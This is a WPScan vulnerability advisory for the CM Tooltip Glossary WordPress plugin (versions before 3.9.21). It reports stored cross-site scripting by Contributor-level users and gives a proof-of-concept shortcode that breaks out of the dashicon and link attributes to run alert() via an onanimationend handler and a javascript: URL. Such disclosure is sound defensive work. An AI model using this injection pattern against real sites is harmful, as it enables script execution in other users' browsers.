Source: wpvulndb
Author: Apple502j
WPVDB-ID: B83880F7-8614-4409-9305-D059B5DF15DD
History: Sep 06, 2021 - 12:00 a.m.

CM Tooltip Glossary < 3.9.21 - Contributor+ Stored Cross-Site Scripting

Published: 2021-09-06 00:00:00
Author: apple502j
Source: wpscan.com

EPSS: 0.001 (Low)
EPSS Percentile: 24.8%

The plugin does not escape some glossary_tooltip shortcode attributes, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.

PoC

[glossary_tooltip dashicon='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(/XSS-enhanced-tooltipglossary_dashicon/)//' link="javascript:alert(/XSS-enhanced-tooltipglossary_link/)"]Click me[/glossary_tooltip]

CPE
Name: enhanced-tooltipglossary
Operator: lt
Version: 3.9.21
